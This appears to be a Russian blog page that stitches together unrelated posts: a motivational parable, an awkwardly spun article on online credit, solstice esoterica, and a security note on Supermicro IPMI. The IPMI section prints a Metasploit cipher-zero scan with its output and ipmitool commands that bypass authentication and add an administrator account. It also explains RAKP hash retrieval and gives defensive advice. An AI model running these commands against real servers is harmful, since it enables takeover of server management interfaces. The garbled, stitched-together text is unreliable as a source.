Есть только один путь достижения — действовать!

действия путь к достижениям

Есть только один путь достижения — действовать!

П. Коэльо

Идете ли Вы к своим целям каждый день, пусть даже маленькими шагами, действуете ли решительно для их достижения?

Есть такая притча:

Странник уже несколько дней путешествовал по пустыне. И вот наконец она закончилась и он подошел к берегу небольшой речушки. Решив было перепрыгнуть на другой берег, он отступил назад для разбега. Отсюда река показалась ему довольно-таки широкой, и он для верности отошел еще на несколько шагов. Отойдя, он обернулся и увидел, что перед ним — самая настоящая большая река, одолеть которую можно, только если разбег будет длинным и очень энергичным.
Читать

Кредиты в интернете. Что может препятствовать их выдаче и как подобного избежать

Кредиты в интернете. Что может препятствовать их выдаче и как подобного избежать

Кредиты в интернете. Что может
препятствовать их выдаче и как подобного
избежать
================================================================================
autfince Семашко on 19/08/2014 17:27:00

Получить ссуду для простого обывателя
представляется чем-то невозможно
затруднительным. Отдельные люди берут
деньги в долг у знакомых или родных, с
замиранием сердца подготавливая плацдарм
для щекотливой просьбы. Чем меньше у
человека появляется необходимость в
займовых средствах, тем сложнее ему
побороть психологический барьер при
одалживании у своих знакомых. Между тем,
банки для того и учреждены, что бы
оперировать свободными средствами, давая
их во временное употребление в случае
нужды. Сейчас операция получения кредита
значительно стала проще. Основоположным
фактором упрощения оказалось техническое
структурообразование индивидуальных
данных людей. Финансовым учреждениям
доступна кредитная история
кредитозаемщика. Собственно поэтому
некоторые банки легко идут на оформление
кредита по интернету. Даже наиболее
малоактивный член современного социума
имеет хорошую возможность на оперативное
приобретение кредита с маленькими
формальностями при оформлении. Важное для
банка — отсутствие человека в разнообразных
неблаговидных базах данных. Эти списки
могут быть созданы теми или иными
поставщиками услуг и предоставлены в бюро
кредитных историй. Несвоевременная оплата
платежей ЖКХ, несоблюдение сроков оплаты
услуг мобильных операторов или
интернет-провайдеров может стать поводом
внесения в список ненадёжных и финансово
неаккуратных лиц. Жаль когда такая
несерьёзная, с точки зрения обывателя,
оплошность как несвоевременная оплата
квартиры оказывается препятствием при
необходимости кредит оформить онлайн. Еще
больше обескураживает тот фактор, что
несерьезный нарушители финансовых правил
соседствуют со злостными неплательщиками
либо, даже, мошенниками. Бюро кредитных
историй тесно работают с банками, какие
являются основоположным источником
достатка сборщиков компрометирующей
информации. Сверх информации о
несоблюдении времени постоянных платежей в
БКИ подается информация непосредственно из
самих банковских учреждений. Нарушения
времени уплаты обязательных платежей по
кредиту в ощутимой мере критически
сказываются на добром имени
кредитозаемщика. В этом случае, даже
большой уровень достатка и возможность
предоставить залоговое имущество могут не
помочь при заключении банковскими
служащими о осуществимости выдать кредиты
онлайн. Проходит немало времени, прежде чем
кредитозаемщику удастся подтянуть свою
репутацию и оказаться исключенным из
перечня ненадёжных

Волшебное и целительное время в день Летнего Солнцестояния

солнечное небоСегодня, 21 июня, День Летнего Солнцестояния (наступает 21 июня 10ч.51м. по Гринвичу или 13ч. 51м. по Москве). Это самый длинный световой день в году, когда Солнце достигает своей самой высшей точки на небе, и день наступления астрономического Лета.

С древних времен этот день имел большое значение для наших предков, что чтили и законы природы в своей жизни. Для них Солнце обладало божественной властью над всем живым, и соответственно летнее солнцестояние символизировало праздник гармонии с природой, наибольший расцвет сил природы, выраженный в изобилии плодов и созревании урожая. Древние славяне отмечали 21 июня день рождения Перуна, кельты — праздник Лита (середину лета, самый длинный день в году). Обряды в этот день во многом напоминают празднование Ивана Купалы (рождества Иоанна Крестителя), что с переходом на новый стиль отмечается сейчас в ночь с 6 на7 июля. В ряде стран по старому обычаю продолжают отмечать Иванов день или День Святого Ивана в дни летнего солнцестояния, на неделе с 20 по 26 июня.

Читать

С Днем Солнца и праздником Летнего Солнцестояния!

с Днем Летнего Солнцестояния!

Поздравляем Вас с Днем Солнца, праздником Летнего Солнцестояния!

Пусть этот день принесет Вам солнечное настроение, наполнит солнечным светом 

и энергией ваше тело, принесет Вам Радость, Любовь, Процветание и Изобилие!

Используйте мощные энергии сегодняшнего дня себе на благо!

Замедлитесь на минуту сейчас и почувствуйте Солнышко, его тепло и свет на своем лице… ощутите как оно светит на Вас и приятно и нежно своими лучиками гладит ваше лицо, как наполняет теплом и энергией каждую вашу клеточку, как Вы впитываете его свет, становясь чище, прозрачнее, светлее … и вот Вы начинаете внутри себя ощущать прилив любви и ваше сердце раскрывается и из него льется световой поток солнечной энергии, который пройдя через Вас, наполнив Вас, выплеснулся наружу в мир…

Читать

5 Мощных Практик на день Летнего Солнцестояния

солнечная жизнь!День Летнего Солнцестояния обладает очень мощной энергетикой, поэтому необходимо использовать энергии этого дня себе на благо за счет выполнения полезных и действенных Практик.

Как же лучше  провести летнее солнцестояние, чтобы внести в свою жизнь волшебные и целительные изменения?!

Вы можете начать свой день с небольшой практики «Наполнение Солнечной энергией».

Читать

IPMI и безопасность

В IPMI Supermicro обнаружена серьезная проблема с безопасностью. Оказалось, что в файле PSBlock хранятся пароли в открытом виде (причина — в спецификации IPMI 2.0), а сам файл можно легко получить простым GET запросом через порт 49152. Уязвимость присутствует во всех платах Supermicro, использующих BMC Nuvoton WPCM450. Что делать?
Временное решение — отключить UPnP, убив соответствующие сервисы. Но при перезагрузке BMC UPnP будет снова запущен.
Если вы по какой-то странной причине просто взяли и выставили IPMI в интернет, то самое время перестать это делать. Как и любой интерфейс управления IPMI должен находится в отдельной сети, наружных доступ — только через VPN. Относитесь к IPMI любого вендора, как к заведомо небезопасному интерфейсу, который позволит злоумышленнику получить доступ к консоли сервера.
Помимо вчерашней уязвимости с PSBlock, есть еще обширный список давно известных уязвимостей, закрытых в последних прошивках. Описание есть на Rapid7:

Cipher 0. Самая скандальная уязвимость, связанная с изначальной ошибкой в спецификации IPMI 2.0. На запрос клиента об использовании нешифрованной передачи данных IPMI позволяет получить доступ без пароля. Вот пример того, что получилось в сети клиента (несколько серверов с платами X8 и X9) после сканирования из Metasploit shell:

msf exploit(libupnp_ssdp_overflow) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.1.0->192.168.1.255 (256 hosts)
[+] 192.168.1.32:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.71:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.219:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Получаем список пользователей:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            false   false      true       ADMINISTRATOR

Добавляем пользователя с ID=3 и администраторскими правами:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set name 3 quartz
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set password 3 Q123q
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user priv 3 4
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user enable 3

Получаем доступ:

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval. Снова проблема в спецификации IPMI 2.0, которая приводит к курьезу: система без всякой авторизации просто отдает хэш пароля. Можно забрать хэши и заняться брутфорсом при помощи какого-нибудь JohnTheRipper.
Есть еще куча дыр: UPnP, анонимный доступ (пользователь с пустым именем), локальный доступ из ОС хоста без авторизации… Уязвимости закрываются в новых прошивках IPMI, но выявляются новые.
Внимательно прочтите «IPMI Security Best Practices» и ограничьте доступ к IPMI.

Автор: Dmitry Nosachev